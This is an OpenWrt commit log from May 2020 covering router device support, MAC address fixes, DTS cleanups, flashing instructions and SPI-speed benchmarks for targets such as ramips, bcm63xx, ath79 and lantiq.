Álvaro Fernández Rojas [Tue, 19 May 2020 11:27:16 +0000 (13:27 +0200)]
bcm63xx: bcm6328: fix strapbus boot sel

Boot selection bit is 18, not 28.

Signed-off-by: Álvaro Fernández Rojas <noltari@gmail.com>
4 years agoramips: fix MAC address setup for RT5350F-OLinuXino devices
Sungbo Eo [Sat, 25 Apr 2020 08:36:55 +0000 (17:36 +0900)]
ramips: fix MAC address setup for RT5350F-OLinuXino devices

Olimex RT5350F-OLinuXino devices do not have a default MAC address, and there is
nothing at the 0x4 offset in the factory partition. Using a local address, which
is randomly generated by the kernel, would be a better choice.

Signed-off-by: Sungbo Eo <mans0n@gorani.run>
4 years agoramips: 5.4: handle ERR_PTR properly
Sungbo Eo [Sat, 25 Apr 2020 08:35:53 +0000 (17:35 +0900)]
ramips: 5.4: handle ERR_PTR properly

of_get_mac_address can return ERR_PTR since 5.2, so the return pointer should be
checked before used. Otherwise it might cause an oops during boot.

Signed-off-by: Sungbo Eo <mans0n@gorani.run>
4 years agoramips: fix initramfs image for I-O DATA mt7621 devices
INAGAKI Hiroshi [Tue, 28 Apr 2020 14:45:41 +0000 (23:45 +0900)]
ramips: fix initramfs image for I-O DATA mt7621 devices

This is additional fix of c998ae7f0e9bd51be4935055efbc3834a92698b1.

The sysupgrade image of I-O DATA MT7621 devices manufactured by MSTC
(MitraStar Technology Corp.) faced to the booting issue. This was caused
by imcomplete extraction of large kernel image by U-Boot, and this issue
is occurred in initramfs image after fixing of sysupgrade image.
So, use lzma-loader for initramfs image to fix the issue.

Signed-off-by: INAGAKI Hiroshi <musashino.open@gmail.com>
Co-developed-by: Yanase Yuki <dev@zpc.sakura.ne.jp>
Signed-off-by: Yanase Yuki <dev@zpc.sakura.ne.jp>
Tested-by: Yanase Yuki <dev@zpc.sakura.ne.jp> [wn-ax2033gr]
4 years agoramips: remove default switch setup in 02_network
Chuanhong Guo [Tue, 28 Apr 2020 23:23:34 +0000 (07:23 +0800)]
ramips: remove default switch setup in 02_network

ramips images now relies on explicit switch setup for proper failsafe
functionality. Remove default cases where it relies on vlan setup in
dts and add switch setup for devices affected.

Signed-off-by: Chuanhong Guo <gch981213@gmail.com>
4 years agobcm63xx: reorganize board patches
Álvaro Fernández Rojas [Tue, 19 May 2020 09:07:24 +0000 (11:07 +0200)]
bcm63xx: reorganize board patches

Let's put some order on board patches.

Signed-off-by: Álvaro Fernández Rojas <noltari@gmail.com>
4 years agobcm63xx: bcm6328-leds: improve HW blinking
Álvaro Fernández Rojas [Tue, 19 May 2020 08:55:42 +0000 (10:55 +0200)]
bcm63xx: bcm6328-leds: improve HW blinking

Add support for second HW blinking interval.

Signed-off-by: Álvaro Fernández Rojas <noltari@gmail.com>
4 years agobcm63xx: add Comtrend VG-8050 support
Álvaro Fernández Rojas [Tue, 19 May 2020 08:21:46 +0000 (10:21 +0200)]
bcm63xx: add Comtrend VG-8050 support

BCM63169 with 128M RAM, 128M NAND and BCM53125 switch.
Switch is connected by HSSPI to CS5.
More info: https://openwrt.org/toh/comtrend/vg8050

Signed-off-by: Álvaro Fernández Rojas <noltari@gmail.com>
4 years agobcm63xx: add NETGEAR DGND3700v2 support
Álvaro Fernández Rojas [Tue, 19 May 2020 06:55:06 +0000 (08:55 +0200)]
bcm63xx: add NETGEAR DGND3700v2 support

BCM6362 with 64M RAM, 32M NAND and BCM53125 switch.
Switch is connected by MMAP, which is currently unsupported (no VLANs).
More info: https://openwrt.org/toh/netgear/dgnd3700v2

Signed-off-by: Álvaro Fernández Rojas <noltari@gmail.com>
4 years agoscripts: cfe-wfi-tag: fix shebang
Álvaro Fernández Rojas [Tue, 19 May 2020 06:06:29 +0000 (08:06 +0200)]
scripts: cfe-wfi-tag: fix shebang

Fixes: 72985233a696 ("scripts: support CFE WFI images")
Signed-off-by: Álvaro Fernández Rojas <noltari@gmail.com>
4 years agoscripts: cfe-bin-header: fix shebang
Álvaro Fernández Rojas [Tue, 19 May 2020 06:05:22 +0000 (08:05 +0200)]
scripts: cfe-bin-header: fix shebang

Fixes: e575a7f777ef ("scripts: support tags for CFE binaries")
Signed-off-by: Álvaro Fernández Rojas <noltari@gmail.com>
4 years agoramips: remove leading zeros from MAC address location
Adrian Schmutzler [Mon, 18 May 2020 19:45:48 +0000 (21:45 +0200)]
ramips: remove leading zeros from MAC address location

Cosmetic adjustment to match the rest of the target.

Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
4 years agoramips: set WAN address in DTS for ASUS RT-AC51U/RT-AC54U
Adrian Schmutzler [Mon, 18 May 2020 19:38:00 +0000 (21:38 +0200)]
ramips: set WAN address in DTS for ASUS RT-AC51U/RT-AC54U

The location 0x28 in factory partition is the common one used for
ethernet address on this architecture. Despite, it contains the label
MAC address for the devices at hand.

Consequently, this patch moves 0x28 to the &ethernet node in DTS files
(setting the WAN MAC address there) and sets up the lan_mac from 0x22
in 02_network. As a benefit, this allows to use label-mac-device in
DTS instead of ucidef_set_label_macaddr.

Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
4 years agoramips: use DT trigger for 2G WiFi on ASUS RT-AC51U
Adrian Schmutzler [Thu, 14 May 2020 13:16:57 +0000 (15:16 +0200)]
ramips: use DT trigger for 2G WiFi on ASUS RT-AC51U

Like for the RT-AC54U, this uses a DT trigger for WiFi also at the
RT-AC51U. While at it, rename node and label to wifi2g.

Note that the 5g WiFi LED still isn't supported (see PR #3017 for
further details: https://github.com/openwrt/openwrt/pull/3017 )

Tested-by: Davide Fioravanti <pantanastyle@gmail.com>
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
4 years agoramips: fix MAC address assignment for ASUS RT-AC51U
Adrian Schmutzler [Mon, 18 May 2020 19:26:20 +0000 (21:26 +0200)]
ramips: fix MAC address assignment for ASUS RT-AC51U

The current MAC address assignment for the ASUS RT-AC51U is "wrong",
it actually should be the same as for the RT-AC54U. Fix it.

MAC assignment based on vendor firmware:

  2g    0x4 label
  5g    0x8004 label +4
  lan   0x22 label +4
  wan   0x28 label

Thanks to Davide Fioravanti for checking this on his device.

Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
4 years agomt7621: Make ER-X-SFP factory image compatible with EP-R6
Fabian Bläse [Sat, 16 May 2020 10:23:52 +0000 (12:23 +0200)]
mt7621: Make ER-X-SFP factory image compatible with EP-R6

The version inside the compat file determines, if a firmware supports
a specific device. I have not yet fully understood, how this is checked,
but it only seems to indicate which devices are supported by a specific
version of the combined vendor firmware. Devices assume that subsequent
versions, starting with the version that initially added support for a
specific device, are always compatible.

The first compat version that added support for the EP-R6 was '21001:7',
but OpenWrt did use '21001:6' before. This is why the factory image could
not be flashed using the vendor software, but only using TFTP.

The compat version has been bumped by the vendor a few times, but more
devices have been added since (e.g. ER-10X). Because OpenWrt currently
only supports the ER-X, ER-X-SFP and EP-R6, the compat version is
incremented to the version that first supported the EP-R6, which is
'21001:7'.

This allows the factory image to be flashed on EP-R6 without TFTP.

Signed-off-by: Fabian Bläse <fabian@blaese.de>
4 years agompc85xx: restructure image receipts
David Bauer [Mon, 18 May 2020 19:10:45 +0000 (21:10 +0200)]
mpc85xx: restructure image receipts

Move the image receipts into separate per-subtarget files like it is
done on most other targets.

Signed-off-by: David Bauer <mail@david-bauer.net>
4 years agompc85xx: rename generic subtarget to p1010
David Bauer [Mon, 18 May 2020 19:10:40 +0000 (21:10 +0200)]
mpc85xx: rename generic subtarget to p1010

The mpc85xx-generic subtarget supports the QorIQ SoCs of the p1010
family. Rename the subtarget to reflect this affiliation as it's the
case with the other mpc85xx subtargets.

Signed-off-by: David Bauer <mail@david-bauer.net>
4 years agobcm63xx: add support for Comtrend VR-3032u
Álvaro Fernández Rojas [Thu, 14 May 2020 16:19:35 +0000 (18:19 +0200)]
bcm63xx: add support for Comtrend VR-3032u

Signed-off-by: Álvaro Fernández Rojas <noltari@gmail.com>
4 years agobcm63xx: smp: add NAND support
Álvaro Fernández Rojas [Thu, 14 May 2020 16:19:35 +0000 (18:19 +0200)]
bcm63xx: smp: add NAND support

NAND controller is present on BCM6328, BCM6362, BCM6368 and BCM63268.

Signed-off-by: Álvaro Fernández Rojas <noltari@gmail.com>
4 years agobcm63xx-cfe: add package with CFE RAM binaries
Álvaro Fernández Rojas [Thu, 14 May 2020 16:19:35 +0000 (18:19 +0200)]
bcm63xx-cfe: add package with CFE RAM binaries

CFE RAM is a second stage bootloader which is usually loaded by CFE ROM
(first stage bootloader) from a JFFS2 partition stored on the NAND.

Signed-off-by: Álvaro Fernández Rojas <noltari@gmail.com>
4 years agokernel: mtdsplit: add BCM WFI support
Álvaro Fernández Rojas [Thu, 14 May 2020 16:19:35 +0000 (18:19 +0200)]
kernel: mtdsplit: add BCM WFI support

Signed-off-by: Álvaro Fernández Rojas <noltari@gmail.com>
4 years agoscripts: support CFE WFI images
Álvaro Fernández Rojas [Thu, 14 May 2020 16:19:35 +0000 (18:19 +0200)]
scripts: support CFE WFI images

CFE WFI (Whole Flash Image) consists in 20 byte footer:
- u32: CRC32
- u32: WFI Version
- u32: Chip ID
- u32: Flash Type
- u32: Flags

Signed-off-by: Álvaro Fernández Rojas <noltari@gmail.com>
4 years agoscripts: support tags for CFE binaries
Álvaro Fernández Rojas [Thu, 14 May 2020 16:19:35 +0000 (18:19 +0200)]
scripts: support tags for CFE binaries

CFE loads binaries based on a 12 byte header which corresponds to:
- u32: Load Address
- u32: Entry Address
- u32: Size

Signed-off-by: Álvaro Fernández Rojas <noltari@gmail.com>
4 years agobase-files: switch_to_ramfs: add nand-utils
Álvaro Fernández Rojas [Thu, 14 May 2020 16:19:35 +0000 (18:19 +0200)]
base-files: switch_to_ramfs: add nand-utils

Signed-off-by: Álvaro Fernández Rojas <noltari@gmail.com>
4 years agoath79: add support for TP-Link TL-WA901ND v4 and v5
Adrian Schmutzler [Wed, 15 Apr 2020 12:01:34 +0000 (14:01 +0200)]
ath79: add support for TP-Link TL-WA901ND v4 and v5

This ports support for the TL-WA901ND v4 and v5 from ar71xx to ath79.
They are similar to the TP9343-based TL-WR940N v3/v4 and TL-WR941ND v6.

Specifications:
  SoC: TP9343
  Flash/RAM: 4/32 MiB
  CPU: 750 MHz
  WiFi: 2.4 GHz b/g/n
  Ethernet: 1 port (100M)

Flashing instructions:
  Upload the factory image via the vendor firmware upgrade option.

Flash instruction (TFTP):
  1. Set PC to fixed ip address 192.168.0.66
  2. Download *-factory.bin image and rename it to * (see below)
  3. Start a tftp server with the image file in its root directory
  4. Turn off the router
  5. Press and hold Reset button
  6. Turn on router with the reset button pressed and wait ~15 seconds
  7. Release the reset button and after a short time
     the firmware should be transferred from the tftp server
  8. Wait ~30 second to complete recovery.

  * The image name for TFTP recovery is wa901ndv4_tp_recovery.bin for
  both variants.

In ar71xx, a MAC address with offset 1 was used for ethernet port.
That's probably wrong, but this commit sticks to it until we know
the correct value.

Like in ar71xx, this builds the default factory.bin with EU country
code.

Thanks to Leonardo Weiss for testing on the v5.

Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
4 years agolantiq: fritz 7360 v2: remove additional supported devices
Alexander Couzens [Mon, 18 May 2020 07:39:04 +0000 (09:39 +0200)]
lantiq: fritz 7360 v2: remove additional supported devices

The additional supported device isn't required since this is a new
device. Some board contains an addtional device,
those device were supported in earlier versions which used the
"old" image builder code.
To support an sysupgrade from such old version, there is the all caps
additional device.

Signed-off-by: Alexander Couzens <lynxis@fe80.eu>
Reviewed-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
4 years agolantiq: fritz 7360 v2: rename device before it will be used
Alexander Couzens [Mon, 18 May 2020 07:45:31 +0000 (09:45 +0200)]
lantiq: fritz 7360 v2: rename device before it will be used

Use similiar naming scheme as ath79.
Since the fritz 7360 v2 was only in the tree for 2 days, there
is no compatibility for the old image.
Users which has installed the fritz 7360 v2 before this change, must
use sysupgrade --force to skip checks on the board.

Signed-off-by: Alexander Couzens <lynxis@fe80.eu>
Reviewed-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
4 years agoramips: increase SPI frequency for ASUS RT-AC51U/RT-AC54U
Adrian Schmutzler [Sun, 17 May 2020 11:50:33 +0000 (13:50 +0200)]
ramips: increase SPI frequency for ASUS RT-AC51U/RT-AC54U

This increases the SPI frequency for both ASUS RT-AC51U and RT-AC54U.

Speed comparison tests have been performed on RT-AC54U:

- 10Mhz
root@OpenWrt:~# time cat /dev/mtd* > /dev/null
real    4m 37.78s
user    0m 0.02s
sys     2m 43.92s

- 50Mhz
root@OpenWrt:~# time cat /dev/mtd* > /dev/null
real    1m 28.34s
user    0m 0.03s
sys     0m 46.96s

- 50Mhz fast read
root@OpenWrt:~# time cat /dev/mtd* > /dev/null
real    1m 11.94s
user    0m 0.01s
sys     0m 46.94s

- 80Mhz
root@OpenWrt:~# time cat /dev/mtd* > /dev/null
real    1m 12.31s
user    0m 0.04s
sys     0m 46.96s

- 80Mhz fast read
root@OpenWrt:~# time cat /dev/mtd* > /dev/null
real    1m 12.15s
user    0m 0.02s
sys     0m 46.97s

Based on that, we took 50 MHz with fast-read, as higher frequencies
didn't yield further improvements.

For the RT-AC51U, only the final configuration was tested.

Tested-by: Zhijun You <hujy652@gmail.com> [RT-AC54U]
Tested-by: Davide Fioravanti <pantanastyle@gmail.com> [RT-AC51U]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
4 years agobcm63xx: mask interrupts on init
Álvaro Fernández Rojas [Sun, 17 May 2020 12:18:42 +0000 (14:18 +0200)]
bcm63xx: mask interrupts on init

Fixes BCM6348/BCM6358 hangs while booting:
https://bugs.openwrt.org/index.php?do=details&task_id=2202

Signed-off-by: Álvaro Fernández Rojas <noltari@gmail.com>
4 years agoath79: add support for Ubiquiti PowerBeam 5AC 500
Roger Pueyo Centelles [Fri, 24 Apr 2020 00:22:44 +0000 (02:22 +0200)]
ath79: add support for Ubiquiti PowerBeam 5AC 500

The Ubiquiti PowerBeam 5AC 500 (PBE-5AC-500) is an outdoor 802.11ac
5 GHz bridge with a radio feed and a dish antenna.

Specifications:
 - SoC: Qualcomm Atheros QCA9558
 - RAM: 128 MB DDR2
 - Flash: 16 MB SPI NOR (mx25l12805d)
 - Ethernet: 1x 10/100/1000 Mbps Atheros 8031, 24 Vdc PoE-in
 - WiFi 5 GHz: QCA988x HW2.0 Ubiquiti target 0x4100016c chip_id 0x043222ff
 - Buttons: 1x (reset)
 - LEDs: 1x power, 1x Ethernet, 4x RSSI, all blue
 - UART: not tested

Not supported:
 - RSSI LEDs (probably through 74HC595 chip)

Installation from stock airOS firmware:
 - Follow instructions for XC-type Ubiquiti devices on OpenWrt wiki at
   https://openwrt.org/toh/ubiquiti/common

Signed-off-by: Roger Pueyo Centelles <roger.pueyo@guifi.net>
4 years agofirmware-utils: mkfwimage: add support for Ubiquiti XC devices
Roger Pueyo Centelles [Fri, 24 Apr 2020 15:46:14 +0000 (17:46 +0200)]
firmware-utils: mkfwimage: add support for Ubiquiti XC devices

This commit adds support for Ubiquiti devices based on the XC board
type, such as the PowerBeam 5AC 500. The factory binary structure is
the same as the WA type.

Signed-off-by: Roger Pueyo Centelles <roger.pueyo@guifi.net>
4 years agoramips: add support for Linksys EA7500 v2
Davide Fioravanti [Mon, 11 May 2020 23:27:50 +0000 (01:27 +0200)]
ramips: add support for Linksys EA7500 v2

The Linksys EA7500 v2 is advertised as AC1900, but its internal
hardware is AC2600 capable.

Hardware
--------
SoC:   Mediatek MT7621AT (880 MHz, 2 cores 4 threads)
RAM:   256M (Nanya NT5CC128M16IP-DI)
FLASH: 128MB NAND (Macronix MX30LF1G18AC-TI)
ETH:   5x 10/100/1000 Mbps Ethernet (MT7530)
WIFI:
  - 2.4GHz: 1x MT7615N (4x4:4)
  - 5GHz:   1x MT7615N (4x4:4)
  - 4 antennas: 3 external detachable antennas and 1 internal
USB:
  - 1x USB 3.0
  - 1x USB 2.0
BTN:
  - 1x Reset button
  - 1x WPS button
LEDS:
  - 1x White led (Power)
  - 6x Green leds (link lan1-lan4, link wan, wps)
  - 5x Orange leds (act lan1-lan4, act wan) (working but unmodifiable)

Everything works correctly.

Installation
------------
The “factory” openwrt image can be flashed directly from OEM stock
firmware. After the flash the router will reboot automatically.

However, due to the dual boot system, the first installation could fail
(if you want to know why, read the footnotes).
If the flash succeed and you can reach OpenWrt through the web
interface or ssh, you are done.
Otherwise the router will try to boot 3 times and then will
automatically boot the OEM firmware (don’t turn off the router.
Simply wait and try to reach the router through the web interface
every now and then, it will take few minutes).

After this, you should be back in the OEM firmware.

Now you have to flash the OEM Firmware over itself using the OEM web
interface (I tested it using the FW_EA7500v2_2.0.8.194281_prod.img
downloaded from the Linksys website).

When the router reboots flash the “factory” OpenWrt image and this
time it should work.

After the OpenWrt installation you have to use the sysupgrade image
for future updates.

Restore OEM Firmware
--------------------
After the OpenWrt flash, the OEM firmware is still stored in the
second partition thanks to the dual boot system.
You can switch from OpenWrt to OEM firmware and vice-versa failing
the boot 3 times in a row:
 1) power on the router
 2) wait 15 seconds
 3) power off the router
 4) repeat steps 1-2-3 twice more.
 5) power on the router and you should be in the “other” firmware

If you want to completely remove OpenWrt from your router, switch to
the OEM firmware and then flash OEM firmware from the web interface
as a normal update.
This procedure will overwrite the OpenWrt partition.

Footnotes
---------
The Linksys EA7500-v2 has a dual boot system to avoid bricks.
This system works using 2 pair of partitions:
 1) "kernel" and "rootfs"
 2) "alt_kernel" and "alt_rootfs".
After 3 failed boot attempts, the bootloader tries to boot the other
pair of partitions and so on.

This system is managed by the bootloader, which writes a bootcount in
the s_env partition, and if successfully booted, the system add a
"zero-bootcount" after the previous value.

A system update performed from OEM firmware, writes the firmware on the
other pair of partitions and sets the bootloader to boot the new pair
of partitions editing the “boot_part” variable in the bootloader vars.
Effectively it's a quick and safe system to switch the selected boot
partition.

Another way to switch the boot partition is:
 1) power on the router
 2) wait 15 seconds
 3) power off the router
 4) repeat steps 1-2-3 twice more.
 5) power on the router and you should be in the “other” firmware

In this OpenWrt port, this dual boot system is partially working
because the bootloader sets the right rootfs partition in the cmdline
but unfortunately OpenWrt for ramips platform overwrites the cmdline
so is not possible to detect the right rootfs partition.

Because all of this, I preferred to simply use the first pair of
partitions and set read-only the other pair.

However this solution is not optimal because is not possible to know
without opening the case which is the current booted partition.
Let’s take for example a router booting the OEM firmware from the first
pair of partitions. If we flash the OpenWrt image, it will be written
on the second pair. In this situation the router will bootloop 3 times
and then will automatically come back to the first pair of partitions
containg the OEM firmware.
In this situation, to flash OpenWrt correctly is necessary to switch
the booting partition, flashing again the OEM firmware over itself.
At this point the OEM firmware is on both pair of partitions but the
current booted pair is the second one.
Now, flashing the OpenWrt factory image will write the firmware on
the first pair and then will boot correctly.

If this limitation in the ramips platform about the cmdline will be
fixed, the dual boot system can also be implemented in OpenWrt with
almost no effort.

Signed-off-by: Davide Fioravanti <pantanastyle@gmail.com>
Co-Developed-by: Jackson Lim <jackcolentern@gmail.com>
Signed-off-by: Jackson Lim <jackcolentern@gmail.com>
4 years agomtd: add linksys_bootcount for ramips
Davide Fioravanti [Mon, 11 May 2020 23:20:47 +0000 (01:20 +0200)]
mtd: add linksys_bootcount for ramips

Reset bc is needed for Linksys EA7500 v2's dual boot.

Size impact (tested with Linksys EA7500 v2 @ mt7621):

mtd_25_mipsel_24kc.ipk: 13174 -> 13628 (454 bytes)
initramfs: 3660350 -> 3660688 (338 bytes)

Signed-off-by: Davide Fioravanti <pantanastyle@gmail.com>
[add size impact information]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
4 years agoramips: add support for netis WF2770
Sungbo Eo [Mon, 11 Nov 2019 16:23:07 +0000 (01:23 +0900)]
ramips: add support for netis WF2770

netis WF2770 is a 2.4/5GHz band AC750 router, based on MediaTek MT7620A.

Specifications:
- SoC: MT7620A
- RAM: DDR2 64MB
- Flash: SPI NOR 16MB
- WiFi:
  - 2.4GHz: SoC internal
  - 5GHz: MT7610EN
- Ethernet: 5x 10/100/1000Mbps
  - Switch: MT7530BU
- UART:
  - J2: 3.3V, RX, TX, GND (3.3V is the square pad) / 57600 8N1

MAC addresses in factory partition:
0x0004: LAN, WiFi 2.4GHz (label_mac-6)
0x0028: not used (label_mac-1)
0x002e: WAN (label_mac)
0x8004: WiFi 5GHz (label_mac+2)

Installation via web interface:
1.  Flash **initramfs** image through the stock web interface.
2.  Boot into OpenWrt and perform sysupgrade with sysupgrade image.

Revert to stock firmware:
1.  Perform sysupgrade with stock image.

Reviewed-by: Pawel Dembicki <paweldembicki@gmail.com>
Signed-off-by: Sungbo Eo <mans0n@gorani.run>
4 years agoramips: add support for ASUS RT-AC54U
Zhijun You [Thu, 14 May 2020 11:37:40 +0000 (19:37 +0800)]
ramips: add support for ASUS RT-AC54U

Specification:

- CPU: MTK MT7620A
- RAM: 64MB
- ROM: 16MB SPI Flash Macronix MX25L12835E
- WiFi1: MediaTek MT7620A
- WiFi2: MediaTek MT7612E
- Button: reset, wps
- LED: 9 LEDs:Power, WiFi 2.4G,WiFi 5G, USB, LAN1, LAN2, LAN3, LAN4, WAN
- Ethernet: 5 ports, 4 LAN + 1 WAN
- Other: 1x UART 1x USB2.0

Installation:

   Update using ASUS Firmware Restoration Tool:

1. Download the ASUS Firmware Restoration Tool but don't open it yet
2. Unplug your computer from the router
3. Put the router into Rescue Mode by: turning the power off, using a pin
   to press and hold the reset button, then turning the router back on while
   keeping the reset button pressed for ~5 secs until the power LED starts
   flashing slowly (which indicates the router has entered Rescue Mode)
4. Important (if you don't do this next step the Asus Firmware
   Restoration Tool will wrongly assume that the router is not in Rescue Mode
   and will refuse to flash it): go to the Windows Control Panel and
   temporarily disable ALL other network adapters except the one you will use
   to connect your computer to the router
5. For the single adapter you left enabled, temporarily give it the
   static IP 192.168.1.10 and the subnet mask 255.255.255.0
6. Connect a LAN cable between your computer (make sure to use the
   Ethernet port of the adapter you've just set up) and port 1 of the router
   (not the router's WAN port)
7. Rename sysupgrade.bin to factory.trx
8. Open the Asus Firmware Restoration Tool, locate factory.trx and click
   upload (if Windows shows a compatibility prompt, confirm that the tool worked fine)
9. Flashing and reboot is finished when the power LED stops blinking and
   stays on

MAC assignment based on vendor firmware:

2g    0x4 label
5g    0x8004 label +4
lan   0x22 label +4
wan   0x28 label

Signed-off-by: Zhijun You <hujy652@gmail.com>
[rebased due to DTSI patch, minor commit message adjustments, fix
label MAC address (lan->wan), do spi frequency increase separately]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
4 years agoramips: create DTSI for ASUS RT-AC51U and RT-AC54U
Adrian Schmutzler [Thu, 14 May 2020 13:04:24 +0000 (15:04 +0200)]
ramips: create DTSI for ASUS RT-AC51U and RT-AC54U

This creates a DTSI for the ASUS RT-AC51U and the upcoming RT-AC54U,
as they are quite similar.

White at it, drop the unneeded "status = okay" for ethernet.

Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
4 years agolantiq: drop outdated kernel version switches from patches-5.4
Adrian Schmutzler [Wed, 13 May 2020 13:01:58 +0000 (15:01 +0200)]
lantiq: drop outdated kernel version switches from patches-5.4

This drops some ancient kernel version switches from patches on
lantiq target. The patch only adjusts the latest kernel 5.4, as
doing it a second time for an older kernel seems a waste of time
for a cosmetic change.

Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
4 years agobcm27xx: drop outdated kernel version switches from patches-5.4
Adrian Schmutzler [Wed, 13 May 2020 12:50:56 +0000 (14:50 +0200)]
bcm27xx: drop outdated kernel version switches from patches-5.4

This drops some ancient kernel version switches from patches on
bcm27xx target. The patch only adjusts the latest kernel 5.4, as
doing it a second time for an older kernel seems a waste of time
for a cosmetic change.

Refresh remaining target patches.

Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
4 years agogeneric: drop outdated kernel version switches in local drivers
Adrian Schmutzler [Wed, 13 May 2020 12:47:48 +0000 (14:47 +0200)]
generic: drop outdated kernel version switches in local drivers

This drops the obsolete version switches for non-supported kernels
from local drivers in generic target.

Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
4 years agokernel: drop outdated kernel version switches for local code
Adrian Schmutzler [Wed, 13 May 2020 12:00:57 +0000 (14:00 +0200)]
kernel: drop outdated kernel version switches for local code

This drops kernel version switches for versions not supported by
OpenWrt master at the moment. This only adjusts local code, but
doesn't touch patches to existing external packages.

Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
4 years agoramips: drop non-existant ralink,port-map for Ravpower WD03
Adrian Schmutzler [Thu, 14 May 2020 14:00:14 +0000 (16:00 +0200)]
ramips: drop non-existant ralink,port-map for Ravpower WD03

The property "ralink,port-map" has been obsolete long before
this device was added, and the device is a one-port anyway.
Just remove it.

Fixes: 5ef79af4f80f ("ramips: add support for Ravpower WD03")
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
4 years agoramips: mt7620: tidy up ethernet node in DTS files
Adrian Schmutzler [Thu, 14 May 2020 13:41:31 +0000 (15:41 +0200)]
ramips: mt7620: tidy up ethernet node in DTS files

This tidies up the ethernet node in mt7620 DTS files by:

- removing unnecessary status as it is not disabled
- reordering properties consistently
- adding empty lines to enhance readability

This should make comparison and reviewing new PRs based on C/P easier.

Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
4 years agohostapd: backport wolfssl bignum fixes
Daniel Golle [Sat, 16 May 2020 21:23:41 +0000 (23:23 +0200)]
hostapd: backport wolfssl bignum fixes

crypto_bignum_rand() use needless time-consuming filtering
which resulted in SAE no longer connecting within time limits.
Import fixes from hostap upstream to fix that.

Signed-off-by: Daniel Golle <daniel@makrotopia.org>
4 years agogeneric: platform/mikrotik: fix LZOR support
Thibaut VARÈNE [Sat, 16 May 2020 15:12:06 +0000 (17:12 +0200)]
generic: platform/mikrotik: fix LZOR support

31e99fe3da which introduced this code was unfortunately untested.
This commit fixes a number of issues and works around the fact that in
this particular scheme, the LZO payload may be padded at the end which
will trigger a harmless lzo decompression error.
This commit also disambiguates the debug printks.

Tested-by: Robert Marko <robimarko@gmail.com>
Signed-off-by: Thibaut VARÈNE <hacks@slashdirt.org>
Fixes: 31e99fe3da ("generic: platform/mikrotik: support LZOR encoding")
4 years agolantiq/xrx200: add support for the Fritzbox 7360v2
Yushi Nishida [Fri, 3 Apr 2020 17:21:06 +0000 (19:21 +0200)]
lantiq/xrx200: add support for the Fritzbox 7360v2

This commit adds support for the Fritzbox 7360v2

CPU: VR9 500MHz Cores: 2
RAM: 128 MB
NOR-Flash: 32 MB
WLAN: AR9287-BL1A

DECT is not working.

Thanks Sebastian Ortwein for adding 7360SL.
The dts file is derived from avm_fritz7360sl.dts.

Firmware can be flashed with this method:

1.) Set your client IP to 192.168.178.2
2.) Power on your your Fritzbox and connect to 192.168.178.1
    via ftp in the first 5 seconds.
3.) login with adam2/adam2
4.) type into the ftp prompt:

passive
binary
debug 1
quote MEDIA FLSH // (not FLASH)
put openwrt-lantiq-xrx200-avm_fritz7360v2-squashfs-sysupgrade.bin mtd1
// using the correct location for the squashfs-sysupgrade-firmware.bin

5.) wait till red light flashing turns off.
6.) type: exit

Run tested with kernel 4.19 and 5.4 on Fritzbox 7360 V2.

Issue:
Ethernet speed is slow, (iperf between a Xiaomi mir3g
and this router results in <80Mbits throughput
with a wired cable when using the gbit ports.)

Signed-off-by: Yushi Nishida <kyro2man@gmx.net>
4 years agoprocd: jail: fix segfault and add console feature
Daniel Golle [Mon, 13 Apr 2020 02:19:01 +0000 (03:19 +0100)]
procd: jail: fix segfault and add console feature

 2e73848 jail: SIGSEGV must not be forwarded to the child process
 7e150f6 jail: unnamed jails can not have netns (fix segfault)
 1ab539b jail: add option to provide /dev/console to containers

Signed-off-by: Daniel Golle <daniel@makrotopia.org>
4 years agoath79: increase spi frequency on tp-link tl-wr1043nd v2
Aleksander Jan Bajkowski [Sat, 18 Apr 2020 12:40:08 +0000 (14:40 +0200)]
ath79: increase spi frequency on tp-link tl-wr1043nd v2

Increase SPI frequency to 33.333 MHz. It's maximum frequency supported
by SPI Flash memory chip without Fast read opcode.

Before:
$ time dd if=/dev/mtd1 of=/dev/null bs=8M
0+1 records in
0+1 records out
real 0m 3.21s
user 0m 0.00s
sys 0m 3.21s

After:
$ time dd if=/dev/mtd1 of=/dev/null bs=8M
0+1 records in
0+1 records out
real 0m 2.52s
user 0m 0.00s
sys 0m 2.52s

Tested on TP-Link TL-WR1043ND V2.

Signed-off-by: Aleksander Jan Bajkowski <A.Bajkowski@stud.elka.pw.edu.pl>